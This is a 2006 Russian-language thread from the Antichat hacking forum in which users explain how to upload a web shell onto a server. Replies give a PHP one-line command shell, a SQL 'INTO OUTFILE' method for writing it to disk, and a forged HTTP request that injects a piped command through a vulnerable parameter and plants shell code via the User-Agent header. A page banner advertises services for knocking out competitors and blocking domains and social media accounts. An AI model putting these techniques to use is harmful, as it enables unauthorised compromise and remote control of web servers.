Форум АНТИЧАТ - Заливка shell при помощи потделки Http запроса

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Заливка shell при помощи потделки Http запроса

Опции темы

Поиск в этой теме

Опции просмотра

Заливка shell при помощи потделки Http запроса

28.10.2006, 14:56

Dimazzz

Участник форума

Регистрация: 23.11.2005

Сообщений: 179

Провел на форуме:
770940

Репутация: 23

Отправить сообщение для Dimazzz с помощью ICQ

Заливка shell при помощи потделки Http запроса

Огрмная просьба , расскажите о этом способе заливки шела по подробнее никак не могу понять как это сделать. Если кто еще умеет через Sql в админке тоже огромная просьба рассказать. Просто другие варианты отпали.

28.10.2006, 16:22

_-[A.M.D]HiM@S-_

Green member

Регистрация: 28.12.2005

Сообщений: 376

Провел на форуме:
5559831

Репутация: 1833

Полноценный шелл залит.

29.10.2006, 08:35

TaNkist

Участник форума

Регистрация: 06.04.2006

Сообщений: 257

Провел на форуме:
367179

Репутация: 76

Подделка HTTP-запроса:
Может тебе поможет софтина RAW HTTP REQUEST (_h0ld-up-team.net.ru). Это прога отправит пакет, который создает на сервере файл и пропишет в него простой php-шелл.
SQL
Создаешь базу с 1 полем, со строкой:

PHP код:


		
			
<?system($_GET['cmd'])?>

Затем составляешь SQL-запрос:
SELECT <название поля> FROM <Имя таблицы> INTO OUTFILE 'путь к шеллу'
Единственное условие ты должен иметь права на запись в папку, куда собираешься залить шелл.

29.10.2006, 10:38

Sharky

Познавший АНТИЧАТ

Регистрация: 01.05.2006

Сообщений: 1,021

Провел на форуме:
3424739

Репутация: 921

Отправить сообщение для Sharky с помощью ICQ

Цитата:

Сообщение от TaNkist

PHP код:


		
			
<?system($_GET['cmd'])?>

по поводу RAW HTTP REQUEST можно поподробней...как составлять запрос?

29.10.2006, 18:49

TaNkist

Участник форума

Регистрация: 06.04.2006

Сообщений: 257

Провел на форуме:
367179

Репутация: 76

Примерный запрос

Код:

GET Уязвимый скрипт?Уязвимый параметр=|echo%20$HTTP_USER_AGENT%20>%20путь к шеллу|    
 HTTP/1.1
Host: Уязвимый хост
User-Agent: <? system(GET['cmd']) ?>

29.10.2006, 22:01

S1nt3z

Новичок

Регистрация: 02.06.2005

Сообщений: 21

Провел на форуме:
10965

Репутация: 0

хы .. можно воспользоваться прогой от отечественного произодителя Antichat

_http://antichat.ru/inetcrack/

30.10.2006, 09:53

Soul Linker

Новичок

Регистрация: 05.09.2006

Сообщений: 15

Провел на форуме:
72328

Репутация: 5

А вообще есть мануал по разным способам заливки шелла? или их не столь много?

30.10.2006, 10:12

S1nt3z

Новичок

Регистрация: 02.06.2005

Сообщений: 21

Провел на форуме:
10965

Репутация: 0

Just google it!

попробуй разобраться сам .. больше опыта будет

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Тунель при помощи Php.	a33	PHP, PERL, MySQL, JavaScript	33	14.07.2007 21:09
Живые прокси	xdx	ICQ	111	15.04.2007 13:10
Коды состояния HTTP - Коды ошибок http сервера	D=P=CH= MOD=	*nix	6	15.10.2006 20:47

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход